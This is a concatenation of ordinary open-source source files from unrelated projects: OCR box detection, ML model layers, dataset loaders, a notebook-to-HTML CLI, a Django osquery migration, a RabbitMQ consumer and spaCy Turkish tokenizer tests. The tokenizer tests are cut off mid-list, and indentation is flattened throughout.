utils/inference_util.py | RubanSeven/CRAFT_keras | 176 | 11156276 | # -*- coding: utf-8 -*-
# @Author: Ruban
# @License: Apache Licence
# @File: inference_util.py
import cv2
import math
import numpy as np
def getDetBoxes_core(text_map, link_map, text_threshold, link_threshold, low_text):
# prepare data
link_map = link_map.copy()
text_map = text_map.copy()
img_h, img_w = text_map.shape
""" labeling method """
ret, text_score = cv2.threshold(text_map, low_text, 1, 0)
ret, link_score = cv2.threshold(link_map, link_threshold, 1, 0)
text_score_comb = np.clip(text_score + link_score, 0, 1)
label_n, labels, stats, centroids = cv2.connectedComponentsWithStats(text_score_comb.astype(np.uint8),
connectivity=4)
det = []
mapper = []
for k in range(1, label_n):
# size filtering
size = stats[k, cv2.CC_STAT_AREA]
if size < 10:
continue
# thresholding
if np.max(text_map[labels == k]) < text_threshold:
continue
x, y = stats[k, cv2.CC_STAT_LEFT], stats[k, cv2.CC_STAT_TOP]
w, h = stats[k, cv2.CC_STAT_WIDTH], stats[k, cv2.CC_STAT_HEIGHT]
niter = int(math.sqrt(size * min(w, h) / (w * h)) * 2)
sx, ex, sy, ey = x - niter, x + w + niter + 1, y - niter, y + h + niter + 1
# boundary check
if sx < 0:
sx = 0
if sy < 0:
sy = 0
if ex >= img_w:
ex = img_w
if ey >= img_h:
ey = img_h
tmp_text_map = text_map[sy:ey, sx:ex]
tmp_labels = labels[sy:ey, sx:ex]
tmp_link_score = link_score[sy:ey, sx:ex]
tmp_text_score = text_score[sy:ey, sx:ex]
# make segmentation map
segmap = np.zeros(tmp_text_map.shape, dtype=np.uint8)
segmap[tmp_labels == k] = 255
segmap[np.logical_and(tmp_link_score == 1, tmp_text_score == 0)] = 0 # remove link area
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (1 + niter, 1 + niter))
segmap = cv2.dilate(segmap, kernel)
# make box
np_contours = np.roll(np.array(np.where(segmap != 0)), 1, axis=0).transpose().reshape(-1, 2)
rectangle = cv2.minAreaRect(np_contours)
box = cv2.boxPoints(rectangle)
# align diamond-shape
w, h = np.linalg.norm(box[0] - box[1]), np.linalg.norm(box[1] - box[2])
box_ratio = max(w, h) / (min(w, h) + 1e-5)
if abs(1 - box_ratio) <= 0.1:
l, r = min(np_contours[:, 0]), max(np_contours[:, 0])
t, b = min(np_contours[:, 1]), max(np_contours[:, 1])
box = np.array([[l, t], [r, t], [r, b], [l, b]], dtype=np.float32)
# make clock-wise order
start_idx = box.sum(axis=1).argmin()
box = np.roll(box, 4 - start_idx, 0)
box = np.array(box)
box += (sx, sy)
det.append(box)
mapper.append(k)
return det, labels, mapper
def getDetBoxes(text_map, link_map, text_threshold, link_threshold, low_text):
boxes, labels, mapper = getDetBoxes_core(text_map, link_map, text_threshold, link_threshold, low_text)
return boxes
def adjustResultCoordinates(polys, ratio_w, ratio_h, ratio_net=2):
if len(polys) > 0:
polys = np.array(polys)
polys *= (ratio_w * ratio_net, ratio_h * ratio_net)
# for k in range(len(polys)):
# if polys[k] is not None:
# polys[k] *= (ratio_w * ratio_net, ratio_h * ratio_net)
return polys
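# Illustrative pipeline (not part of the original module), assuming `text_map`
# and `link_map` are the two score maps produced by a CRAFT model for an image
# resized by (ratio_w, ratio_h); the threshold values below are commonly used
# defaults and are only an assumption here:
#     boxes = getDetBoxes(text_map, link_map,
#                         text_threshold=0.7, link_threshold=0.4, low_text=0.4)
#     boxes = adjustResultCoordinates(boxes, ratio_w, ratio_h)
# Each box is a (4, 2) array of corner points in clockwise order, scaled back
# to the original image coordinates (the score maps are at half resolution,
# hence ratio_net=2).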
|
softlearning/replay_pools/replay_pool.py | limash/softlearning | 920 | 11156299 | <filename>softlearning/replay_pools/replay_pool.py
import abc
class ReplayPool(object):
"""A class used to save and replay data."""
@abc.abstractmethod
def add_sample(self, sample):
"""Add a transition tuple."""
pass
@abc.abstractmethod
def terminate_episode(self):
"""Clean up pool after episode termination."""
pass
@property
@abc.abstractmethod
def size(self, **kwargs):
pass
@property
@abc.abstractmethod
def add_path(self, path):
"""Add a rollout to the replay pool."""
pass
@abc.abstractmethod
def random_batch(self, batch_size):
"""Return a random batch of size `batch_size`."""
pass
|
setup.py | dendisuhubdy/attention-lvcsr | 295 | 11156307 | from os import path
from setuptools import find_packages, setup
here = path.abspath(path.dirname(__file__))
setup(
name='lvsr',
description='Fully Neural LVSR',
url='https://github.com/rizar/fully-neural-lvsr',
author='<NAME>',
license='MIT',
packages=find_packages(exclude=['examples', 'docs', 'tests']),
zip_safe=False,
install_requires=['numpy', 'pykwalify', 'toposort', 'pyyaml',
'picklable-itertools', 'pandas', 'pyfst']
)
|
zeus/modules/tensformers/output.py | shaido987/vega | 240 | 11156317 | # -*- coding:utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""This is Output classes."""
from zeus.modules.operators import ops
from zeus.modules.module import Module
from zeus.common.class_factory import ClassType, ClassFactory
@ClassFactory.register(ClassType.NETWORK)
class BertOutput(Module):
"""Bert Output."""
def __init__(self, config):
super(BertOutput, self).__init__()
self.dense = ops.Linear(config.intermediate_size, config.hidden_size)
self.LayerNorm = ops.LayerNorm(config.hidden_size, eps=1e-12)
self.dropout = ops.Dropout(config.hidden_dropout_prob)
def call(self, hidden_states, input_tensor):
"""Call BertOutput."""
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
@ClassFactory.register(ClassType.NETWORK)
class BertSelfOutput(Module):
"""Bert Self Output."""
def __init__(self, config):
super(BertSelfOutput, self).__init__()
self.dense = ops.Linear(config.hidden_size, config.hidden_size)
self.LayerNorm = ops.LayerNorm(config.hidden_size, eps=1e-12)
self.dropout = ops.Dropout(config.hidden_dropout_prob)
def call(self, hidden_states, input_tensor):
"""Call Bert Self Output."""
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
|
rotkehlchen/utils/version_check.py | rotkehlchenio/rotkehlchen | 137 | 11156322 | from typing import NamedTuple, Optional
from pkg_resources import parse_version
from rotkehlchen.errors.misc import RemoteError
from rotkehlchen.externalapis.github import Github
from rotkehlchen.utils.misc import get_system_spec
class VersionCheckResult(NamedTuple):
our_version: str
latest_version: Optional[str] = None
download_url: Optional[str] = None
def get_current_version(check_for_updates: bool) -> VersionCheckResult:
"""Get current version of rotki. If check_for_updates is set to true it also checks
if a new version is available.
If there is a remote query error return only our version.
If there is no newer version for download returns only our current version and latest version.
If yes returns (our_version_str, latest_version_str, download_url)
"""
our_version_str = get_system_spec()['rotkehlchen']
if check_for_updates:
our_version = parse_version(our_version_str)
github = Github()
try:
latest_version_str, url = github.get_latest_release()
except RemoteError:
# Completely ignore all remote errors. If Github has problems we just don't check now
return VersionCheckResult(our_version=our_version_str)
latest_version = parse_version(latest_version_str)
if latest_version <= our_version:
return VersionCheckResult(
our_version=our_version_str,
latest_version=latest_version_str,
)
return VersionCheckResult(
our_version=our_version_str,
latest_version=latest_version_str,
download_url=url,
)
return VersionCheckResult(our_version=our_version_str)
|
datasets/food101.py | zlapp/CoOp | 317 | 11156327 | import os
from dassl.data.datasets import DATASET_REGISTRY, Datum, DatasetBase
from .oxford_pets import OxfordPets
from .dtd import DescribableTextures as DTD
@DATASET_REGISTRY.register()
class Food101(DatasetBase):
dataset_dir = "food-101"
def __init__(self, cfg):
root = os.path.abspath(os.path.expanduser(cfg.DATASET.ROOT))
self.dataset_dir = os.path.join(root, self.dataset_dir)
self.image_dir = os.path.join(self.dataset_dir, "images")
self.split_path = os.path.join(self.dataset_dir, "split_zhou_Food101.json")
if os.path.exists(self.split_path):
train, val, test = OxfordPets.read_split(self.split_path, self.image_dir)
else:
train, val, test = DTD.read_and_split_data(self.image_dir)
OxfordPets.save_split(train, val, test, self.split_path, self.image_dir)
num_shots = cfg.DATASET.NUM_SHOTS
train = self.generate_fewshot_dataset(train, num_shots=num_shots)
val = self.generate_fewshot_dataset(val, num_shots=min(num_shots, 4))
super().__init__(train_x=train, val=val, test=test)
|
templates/fips-gen.py | mattiasljungstrom/fips | 429 | 11156351 | <reponame>mattiasljungstrom/fips<filename>templates/fips-gen.py
"""
Code generator template file. This is called from a cmake
code generator build target with the full path to a
yaml file which contains detailed code gen params.
"""
import os
import sys
# FIXME PYTHON3
is_python3 = sys.version_info > (3,5)
if is_python3:
import importlib.util
else:
import imp
# template variable will be replaced with
# imported generator paths
gen_paths = [ $genpaths ]
# make imported generator modules visible to python module system
for path in gen_paths :
sys.path.insert(0, path)
# yaml module is under the fips directory
import yaml
from mod import log
import genutil
def processFile(attrs) :
# dynamically load (and execute) the generator module
absPyPath = attrs['generator']
input = attrs['in']
out_src = attrs['out_src']
out_hdr = attrs['out_hdr']
if 'args' in attrs :
args = attrs['args']
else :
args = None
if 'env' in attrs :
env = attrs['env']
else :
env = None
genutil.setEnv(env)
path, script = os.path.split(absPyPath)
sys.path.insert(0, path)
moduleName, ext = os.path.splitext(script)
if is_python3:
module = importlib.import_module(moduleName)
else:
# FIXME PYTHON2
fp, pathname, description = imp.find_module(moduleName)
module = imp.load_module(moduleName, fp, pathname, description)
if args :
module.generate(input, out_src, out_hdr, args)
else :
module.generate(input, out_src, out_hdr)
#=== entry point
if len(sys.argv) == 2 :
with open(sys.argv[1], 'r') as f :
items = yaml.load(f)
for attrs in items :
processFile(attrs)
else :
print('Needs full path to a generator .yml file!')
exit(10)
|
nbinteract/cli.py | bnavigator/nbinteract | 214 | 11156352 | '''Converts notebooks to interactive HTML pages.
Usage:
nbinteract init
nbinteract NOTEBOOKS ...
nbinteract [options] NOTEBOOKS ...
nbinteract (-h | --help)
`nbinteract init` initializes a GitHub project for nbinteract. It
provides guided help to set up a requirements.txt file (if needed) and a Binder
image for the project.
`nbinteract NOTEBOOKS ...` converts notebooks into HTML pages. Note that
running this command outside a GitHub project initialized with `nbinteract
init` requires you to specify the --spec SPEC option.
Arguments:
NOTEBOOKS List of notebooks or folders to convert. If folders are passed in,
all the notebooks in each folder are converted. The resulting HTML
files are created adjacent to their originating notebooks and will
clobber existing files of the same name.
By default, notebooks in subfolders will not be converted; use the
--recursive flag to recursively convert notebooks in subfolders.
Options:
-h --help Show this screen
-s SPEC --spec SPEC BinderHub spec for Jupyter image. Must be in the
format: `{username}/{repo}/{branch}`. For example:
'SamLau95/nbinteract-image/master'. This flag is
**required** unless a .nbinteract.json file exists
in the project root with the "spec" key. If branch
is not specified, default to `master`.
-t TYPE --template TYPE Specifies the type of HTML page to generate. Valid
types: full (standalone page), partial (embeddable
page with library), or plain (embeddable page
without JS).
[default: full]
-B --no-top-button If set, doesn't generate button at top of page.
-r --recursive Recursively convert notebooks in subdirectories.
-o FOLDER --output=FOLDER Outputs HTML files into FOLDER instead of
outputting files adjacent to their originating
notebooks. All files will be direct descendants of
the folder even if --recursive is set.
-i FOLDER --images=FOLDER Extracts images from HTML and writes into FOLDER
instead of encoding images in base64 in the HTML.
Requires -o option to be set as well.
-e --execute Executes the notebook before converting to HTML,
functioning like the equivalent flag for
nbconvert. Configure NbiExecutePreprocessor to
change conversion instead of the base
ExecutePreprocessor.
'''
from docopt import docopt, DocoptExit
from glob import glob
import os
import re
import sys
from textwrap import wrap
import subprocess
import json
import fnmatch
from collections import defaultdict
import nbformat
from traitlets.config import Config
from .exporters import InteractExporter
BLUE = "\033[0;34m"
RED = "\033[91m"
NOCOLOR = "\033[0m"
CONFIG_FILE = '.nbinteract.json'
VALID_TEMPLATES = set(['full', 'plain', 'partial', 'local'])
SPEC_REGEX = re.compile(r'\S+/\S+(/\S+)?')
BINDER_BASE_URL = 'https://mybinder.org/v2/gh/'
REQUIREMENTS_DOCS = 'http://mybinder.readthedocs.io/en/latest/using.html#id8'
DOCKER_DOCS = 'https://mybinder.readthedocs.io/en/latest/dockerfile.html'
ERROR = 1
SUCCESS = 0
DEFAULT_REQUIREMENTS_TXT = '''
numpy
ipywidgets
nbinteract
'''.strip()
def binder_spec_from_github_url(github_url):
"""
Converts GitHub origin into a Binder spec.
For example:
[email protected]:SamLau95/nbinteract.git -> SamLau95/nbinteract/master
https://github.com/Calebs97/riemann_book -> Calebs97/riemann_book/master
"""
if github_url.endswith('.git'):
github_url = github_url[:-4]
tokens = re.split(r'/|:', github_url)
# The username and reponame are the last two tokens
return '{}/{}/master'.format(tokens[-2], tokens[-1])
def flatmap(fn, iterable, *args, **kwargs):
return [
mapped for item in iterable for mapped in fn(item, *args, **kwargs)
]
def color(text, text_color):
return text_color + text + NOCOLOR
def log(text='', line_length=80, heading='[nbinteract] ', text_color=BLUE):
width = line_length - len(heading)
for line in wrap(text, width, subsequent_indent=' ') or ['']:
print(color(heading, text_color) + line)
def error(text='', line_length=80, heading='[nbinteract] '):
log(text, line_length, heading, text_color=RED)
def yes_or_no(question, default="yes"):
"""Ask a yes/no question via input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is True for "yes" or False for "no".
"""
valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False}
if default is None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
sys.stdout.write(
'{}[nbinteract]{} {}{}'.format(BLUE, NOCOLOR, question, prompt)
)
choice = input().lower()
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
sys.stdout.write(
"Please respond with 'yes' or 'no' "
"(or 'y' or 'n').\n"
)
def main():
"""
Parses command line options and runs nbinteract.
"""
arguments = docopt(__doc__)
if arguments['init']:
return_code = init()
sys.exit(return_code)
run_converter(arguments)
def run_converter(arguments):
"""
Converts notebooks to HTML files. Returns list of output file paths
"""
# Get spec from config file
if os.path.isfile(CONFIG_FILE):
with open(CONFIG_FILE, encoding='utf-8') as f:
config = json.load(f)
arguments['--spec'] = arguments['--spec'] or config['spec']
check_arguments(arguments)
notebooks = flatmap(
expand_folder,
arguments['NOTEBOOKS'],
recursive=arguments['--recursive']
)
exporter = init_exporter(
extract_images=arguments['--images'],
spec=arguments['--spec'],
template_file=arguments['--template'],
button_at_top=(not arguments['--no-top-button']),
execute=arguments['--execute'],
)
log('Converting notebooks to HTML...')
output_files = []
for notebook in notebooks:
output_file = convert(
notebook,
exporter=exporter,
output_folder=arguments['--output'],
images_folder=arguments['--images']
)
output_files.append(output_file)
log('Converted {} to {}'.format(notebook, output_file))
log('Done!')
if arguments['--images']:
log('Resulting images located in {}'.format(arguments['--images']))
return output_files
def init():
'''
Initializes git repo for nbinteract.
1. Checks for requirements.txt or Dockerfile, offering to create a
requirements.txt if needed.
2. Sets the Binder spec using the `origin` git remote in .nbinteract.json.
3. Prints a Binder URL so the user can debug their image if needed.
'''
log('Initializing folder for nbinteract.')
log()
log('Checking to see if this folder is the root folder of a git project.')
if os.path.isdir('.git'):
log("Looks like we're in the root of a git project.")
else:
error(
"This folder doesn't look like the root of a git project. "
"Please rerun nbinteract init in the top-level folder of a "
"git project."
)
return ERROR
log()
log('Checking for requirements.txt or Dockerfile.')
if os.path.isfile('Dockerfile'):
log(
'Dockerfile found. Note that Binder will use the Dockerfile '
'instead of the requirements.txt file, so you should make sure '
'your Dockerfile follows the format in {docker_docs}'
.format(docker_docs=DOCKER_DOCS)
)
elif os.path.isfile('requirements.txt'):
log('requirements.txt found.')
else:
log('No requirements.txt file found.')
yes = yes_or_no(
'Would you like to create a sample requirements.txt file?'
)
if yes:
# TODO(sam): Don't hard-code requirements.txt
with open('requirements.txt', 'w', encoding='utf-8') as f:
f.write(DEFAULT_REQUIREMENTS_TXT)
log(
'Created requirements.txt. Edit this file now to include the '
'rest of your dependencies, then rerun nbinteract init.'
)
return SUCCESS
else:
log(
'Please manually create a requirements.txt file, then rerun '
'nbinteract init.'
)
return SUCCESS
log()
log('Generating .nbinteract.json file...')
if os.path.isfile(CONFIG_FILE):
log(
".nbinteract.json already exists, skipping generation. If you'd "
"like to regenerate the file, remove .nbinteract.json and rerun "
"this command."
)
log()
log("Initialization success!")
return SUCCESS
try:
github_origin = str(
subprocess.check_output(
'git remote get-url origin',
stderr=subprocess.STDOUT,
shell=True
), 'utf-8'
).strip()
except subprocess.CalledProcessError as e:
error(
"No git remote called origin found. Please set up your project's"
"origin remote to point to a GitHub URL.\ngit error: {}".format(e)
)
return ERROR
if 'github' not in github_origin:
error(
"Your project's origin remote {} doesn't look like a github "
"URL. This may cause issues with Binder, so please double check "
"your .nbinteract.json file after this script finishes. "
"Continuing as planned..."
)
binder_spec = binder_spec_from_github_url(github_origin)
with open(CONFIG_FILE, 'w', encoding='utf-8') as f:
json.dump({'spec': binder_spec}, f, indent=4)
log('Created .nbinteract.json file successfully')
log()
log(
'Initialization complete! Now, you should make a git commit with the '
        'files created in this process and push your commits to GitHub.'
)
log()
log(
'After you push, you should visit {} and verify that your Binder '
'image successfully starts.'.format(BINDER_BASE_URL + binder_spec)
)
def check_arguments(arguments):
if not arguments['--spec']:
error(
'--spec flag not set and no .nbinteract.json file found. Rerun '
'this command with the --spec flag or run `nbinteract init` to '
'resolve this issue.'
)
raise DocoptExit()
if not SPEC_REGEX.match(arguments['--spec']):
error(
'Spec must be in the format {username}/{repo}/{branch} but got ' +
arguments['--spec'] + '.\n'
'Exiting...'
)
raise DocoptExit()
if arguments['--images'] and not arguments['--output']:
error(
'If --images is specified, --output must also be specified. '
'Exiting...'
)
raise DocoptExit()
if arguments['--template'] not in VALID_TEMPLATES:
error(
'Unsupported template: "{}". Template must be one of: \n{}'
.format(arguments['--template'], VALID_TEMPLATES)
)
raise DocoptExit()
def expand_folder(notebook_or_folder, recursive=False):
"""
If notebook_or_folder is a folder, returns a list containing all notebooks
in the folder. Otherwise, returns a list containing the notebook name.
If recursive is True, recurses into subdirectories.
"""
is_file = os.path.isfile(notebook_or_folder)
is_dir = os.path.isdir(notebook_or_folder)
if not (is_file or is_dir):
raise ValueError(
'{} is neither an existing file nor a folder.'
.format(notebook_or_folder)
)
if is_file:
return [notebook_or_folder]
# Now we know the input is a directory
if not recursive:
return glob('{}/*.ipynb'.format(notebook_or_folder))
# Recursive case
return [
os.path.join(folder, filename)
for folder, _, filenames in os.walk(notebook_or_folder)
# Skip folders that start with .
if not os.path.basename(folder).startswith('.')
for filename in fnmatch.filter(filenames, '*.ipynb')
]
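# Illustrative behavior of expand_folder (paths below are hypothetical):
#
#     expand_folder('analysis.ipynb')             # -> ['analysis.ipynb']
#     expand_folder('notebooks')                  # -> top-level *.ipynb files only
#     expand_folder('notebooks', recursive=True)  # walks subfolders, skipping
#                                                 # dot-directories like .ipynb_checkpoints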
def init_exporter(extract_images, execute, **exporter_config):
"""
Returns an initialized exporter.
"""
config = Config(InteractExporter=exporter_config)
preprocessors = []
if extract_images:
# Use ExtractOutputPreprocessor to extract the images to separate files
preprocessors.append(
'nbconvert.preprocessors.ExtractOutputPreprocessor'
)
if execute:
# Use the NbiExecutePreprocessor to correctly generate widget output
# for interact() calls.
preprocessors.append('nbinteract.preprocessors.NbiExecutePreprocessor')
config.InteractExporter.preprocessors = preprocessors
exporter = InteractExporter(config=config)
return exporter
def make_exporter_resources(nb_name, out_folder, images_folder=None):
"""
Creates resources dict for the exporter
"""
resources = defaultdict(str)
resources['metadata'] = defaultdict(str)
resources['metadata']['name'] = nb_name
resources['metadata']['path'] = out_folder
# This results in images like AB_5_1.png for a notebook called AB.ipynb
resources['unique_key'] = nb_name
resources['output_files_dir'] = images_folder
return resources
def convert(notebook_path, exporter, output_folder=None, images_folder=None):
"""
Converts notebook into an HTML file, outputting notebooks into
output_folder if set and images into images_folder if set.
Returns the path to the resulting HTML file.
"""
if output_folder:
os.makedirs(output_folder, exist_ok=True)
if images_folder:
os.makedirs(images_folder, exist_ok=True)
# Computes notebooks/ch1 and <name>.ipynb from notebooks/ch1/<name>.ipynb
path, filename = os.path.split(notebook_path)
# Computes <name> from <name>.ipynb
basename, _ = os.path.splitext(filename)
# Computes <name>.html from notebooks/<name>.ipynb
outfile_name = basename + '.html'
# If output_folder is not set, we default to the original folder of the
# notebook.
out_folder = path if not output_folder else output_folder
outfile_path = os.path.join(out_folder, outfile_name)
notebook = nbformat.read(notebook_path, as_version=4)
html, resources = exporter.from_notebook_node(
notebook,
resources=make_exporter_resources(basename, out_folder, images_folder),
)
# Write out HTML
with open(outfile_path, 'w', encoding='utf-8') as outfile:
outfile.write(html)
# Write out images. If images_folder wasn't specified, resources['outputs']
# is None so this loop won't run
for image_path, image_data in resources.get('outputs', {}).items():
with open(image_path, 'wb') as outimage:
outimage.write(image_data)
return outfile_path
if __name__ == '__main__':
main()
|
zentral/contrib/osquery/migrations/0008_auto_20210323_1844.py | janheise/zentral | 634 | 11156381 | # Generated by Django 2.2.18 on 2021-03-23 18:44
import django.contrib.postgres.fields
import django.core.validators
from django.db import migrations, models
from django.db.models import F
def update_osquery_queries(apps, schema_editor):
Pack = apps.get_model("osquery", "Pack")
for pack in Pack.objects.all():
for packquery in pack.packquery_set.all():
platforms = packquery.platforms or pack.platforms
minimum_osquery_version = packquery.minimum_osquery_version or pack.minimum_osquery_version
if platforms or minimum_osquery_version:
packquery.query.platforms = platforms
packquery.query.minimum_osquery_version = minimum_osquery_version
packquery.query.version = F("version") + 1
packquery.query.save()
def update_osquery_enrolled_machine_platform_mask(apps, schema_editor):
try:
from zentral.contrib.inventory.models import MetaMachine
from zentral.contrib.inventory.conf import LINUX, MACOS, WINDOWS
except ImportError:
pass
EnrolledMachine = apps.get_model("osquery", "EnrolledMachine")
for enrolled_machine in EnrolledMachine.objects.all():
mm = MetaMachine(enrolled_machine.serial_number)
if mm.platform:
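            # The bit values appear to mirror osquery's PlatformType flags
            # (0x01 posix, 0x02 windows, 0x04 bsd, 0x08 linux, 0x10 macos),
            # so Linux and macOS hosts are also flagged as POSIX.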
if mm.platform == LINUX:
enrolled_machine.platform_mask = 0x01 | 0x08
elif mm.platform == MACOS:
enrolled_machine.platform_mask = 0x01 | 0x04 | 0x10
elif mm.platform == WINDOWS:
enrolled_machine.platform_mask = 0x02
else:
print("Unsupported osquery enrolled machine platform", mm.platform)
continue
enrolled_machine.save()
class Migration(migrations.Migration):
dependencies = [
('osquery', '0007_auto_20210215_2159'),
]
operations = [
migrations.AddField(
model_name='distributedquery',
name='minimum_osquery_version',
field=models.CharField(
editable=False, max_length=14, null=True,
validators=[django.core.validators.RegexValidator('^[0-9]{1,4}\\.[0-9]{1,4}\\.[0-9]{1,4}(\\.[0-9]{1,4})?$')]
),
),
migrations.AddField(
model_name='distributedquery',
name='platforms',
field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(choices=[('darwin', 'darwin'), ('freebsd', 'freebsd'), ('linux', 'linux'), ('posix', 'posix'), ('windows', 'windows')], max_length=32), default=list, editable=False, size=None),
),
migrations.AddField(
model_name='query',
name='minimum_osquery_version',
field=models.CharField(
blank=True,
help_text='This query will only execute on osquery versions greater than or equal-to this version string',
max_length=14, null=True,
validators=[django.core.validators.RegexValidator('^[0-9]{1,4}\\.[0-9]{1,4}\\.[0-9]{1,4}(\\.[0-9]{1,4})?$')]
),
),
migrations.AddField(
model_name='query',
name='platforms',
field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(choices=[('darwin', 'darwin'), ('freebsd', 'freebsd'), ('linux', 'linux'), ('posix', 'posix'), ('windows', 'windows')], max_length=32), blank=True, default=list, help_text="Restrict this query to some platforms, default is 'all' platforms", size=None),
),
migrations.RunPython(update_osquery_queries),
migrations.RemoveField(
model_name='pack',
name='minimum_osquery_version',
),
migrations.RemoveField(
model_name='pack',
name='platforms',
),
migrations.RemoveField(
model_name='packquery',
name='minimum_osquery_version',
),
migrations.RemoveField(
model_name='packquery',
name='platforms',
),
migrations.AddField(
model_name='enrolledmachine',
name='platform_mask',
field=models.PositiveSmallIntegerField(default=0),
),
migrations.RunPython(update_osquery_enrolled_machine_platform_mask),
]
|
Examples/6.2.2 Hashing Consumer.py | wangyonghong/RabbitMQ-in-Depth | 111 | 11156402 | <reponame>wangyonghong/RabbitMQ-in-Depth<filename>Examples/6.2.2 Hashing Consumer.py<gh_stars>100-1000
import os
import hashlib
import rabbitpy
# Open a connection and channel (the original snippet assumes an already-open
# `channel`; a default local AMQP connection is used here as a sketch)
connection = rabbitpy.Connection()
channel = connection.channel()
# Create the worker queue
queue_name = 'hashing-worker-%s' % os.getpid()
queue = rabbitpy.Queue(channel, queue_name,
auto_delete=True,
durable=False,
exclusive=True)
# Declare the worker queue
if queue.declare():
print('Worker queue declared')
# Bind the worker queue
if queue.bind('fanout-rpc-requests'):
print('Worker queue bound')
# Consume messages from RabbitMQ
for message in queue.consume_messages():
# Create the hashing object
hash_obj = hashlib.md5(message.body)
# Print out the info, this might go into a database or log file
print('Image with correlation-id of %s has a hash of %s' %
(message.properties['correlation_id'],
hash_obj.hexdigest()))
# Acknowledge the delivery of the RPC request message
message.ack()
|
entity/cards/LT21_04H/__init__.py | x014/lushi_script | 102 | 11156407 | # -*- coding: utf-8 -*-
import entity.cards.LT21_04H.LT21_019
import entity.cards.LT21_04H.LT21_020
import entity.cards.LT21_04H.LT21_021
import entity.cards.LT21_04H.LT21_022_
import entity.cards.LT21_04H.LT21_023_
import entity.cards.LT21_04H.LT21_024_
|
spacy/tests/lang/tr/test_tokenizer.py | snosrap/spaCy | 22,040 | 11156410 | import pytest
ABBREV_TESTS = [
("Dr. <NAME> ile görüştüm.", ["Dr.", "Murat", "Bey", "ile", "görüştüm", "."]),
("Dr.la görüştüm.", ["Dr.la", "görüştüm", "."]),
("Dr.'la görüştüm.", ["Dr.'la", "görüştüm", "."]),
("TBMM'de çalışıyormuş.", ["TBMM'de", "çalışıyormuş", "."]),
(
"Hem İst. hem Ank. bu konuda gayet iyi durumda.",
["Hem", "İst.", "hem", "Ank.", "bu", "konuda", "gayet", "iyi", "durumda", "."],
),
(
"Hem İst. hem Ank.'da yağış var.",
["Hem", "İst.", "hem", "Ank.'da", "yağış", "var", "."],
),
("Dr.", ["Dr."]),
("Yrd.Doç.", ["Yrd.Doç."]),
("Prof.'un", ["Prof.'un"]),
("Böl.'nde", ["Böl.'nde"]),
]
URL_TESTS = [
(
"Bizler de www.duygu.com.tr adında bir websitesi kurduk.",
[
"Bizler",
"de",
"www.duygu.com.tr",
"adında",
"bir",
"websitesi",
"kurduk",
".",
],
),
(
"Bizler de https://www.duygu.com.tr adında bir websitesi kurduk.",
[
"Bizler",
"de",
"https://www.duygu.com.tr",
"adında",
"bir",
"websitesi",
"kurduk",
".",
],
),
(
"Bizler de www.duygu.com.tr'dan satın aldık.",
["Bizler", "de", "www.duygu.com.tr'dan", "satın", "aldık", "."],
),
(
"Bizler de https://www.duygu.com.tr'dan satın aldık.",
["Bizler", "de", "https://www.duygu.com.tr'dan", "satın", "aldık", "."],
),
]
NUMBER_TESTS = [
("Rakamla 6 yazılıydı.", ["Rakamla", "6", "yazılıydı", "."]),
("Hava -4 dereceydi.", ["Hava", "-4", "dereceydi", "."]),
(
"Hava sıcaklığı -4ten +6ya yükseldi.",
["Hava", "sıcaklığı", "-4ten", "+6ya", "yükseldi", "."],
),
(
"Hava sıcaklığı -4'ten +6'ya yükseldi.",
["Hava", "sıcaklığı", "-4'ten", "+6'ya", "yükseldi", "."],
),
("Yarışta 6. oldum.", ["Yarışta", "6.", "oldum", "."]),
("Yarışta 438547745. oldum.", ["Yarışta", "438547745.", "oldum", "."]),
("Kitap IV. Murat hakkında.", ["Kitap", "IV.", "Murat", "hakkında", "."]),
# ("Bana söylediği sayı 6.", ["Bana", "söylediği", "sayı", "6", "."]),
("Saat 6'da buluşalım.", ["Saat", "6'da", "buluşalım", "."]),
("Saat 6dan sonra buluşalım.", ["Saat", "6dan", "sonra", "buluşalım", "."]),
("6.dan sonra saymadım.", ["6.dan", "sonra", "saymadım", "."]),
("6.'dan sonra saymadım.", ["6.'dan", "sonra", "saymadım", "."]),
("Saat 6'ydı.", ["Saat", "6'ydı", "."]),
("5'te", ["5'te"]),
("6'da", ["6'da"]),
("9dan", ["9dan"]),
("19'da", ["19'da"]),
("VI'da", ["VI'da"]),
("5.", ["5."]),
("72.", ["72."]),
("VI.", ["VI."]),
("6.'dan", ["6.'dan"]),
("19.'dan", ["19.'dan"]),
("6.dan", ["6.dan"]),
("16.dan", ["16.dan"]),
("VI.'dan", ["VI.'dan"]),
("VI.dan", ["VI.dan"]),
("Hepsi 1994 yılında oldu.", ["Hepsi", "1994", "yılında", "oldu", "."]),
("Hepsi 1994'te oldu.", ["Hepsi", "1994'te", "oldu", "."]),
(
"2/3 tarihli faturayı bulamadım.",
["2/3", "tarihli", "faturayı", "bulamadım", "."],
),
(
"2.3 tarihli faturayı bulamadım.",
["2.3", "tarihli", "faturayı", "bulamadım", "."],
),
(
"2.3. tarihli faturayı bulamadım.",
["2.3.", "tarihli", "faturayı", "bulamadım", "."],
),
(
"2/3/2020 tarihli faturayı bulamadm.",
["2/3/2020", "tarihli", "faturayı", "bulamadm", "."],
),
(
"2/3/1987 tarihinden beri burda yaşıyorum.",
["2/3/1987", "tarihinden", "beri", "burda", "yaşıyorum", "."],
),
(
"2-3-1987 tarihinden beri burdayım.",
["2-3-1987", "tarihinden", "beri", "burdayım", "."],
),
(
"2.3.1987 tarihinden beri burdayım.",
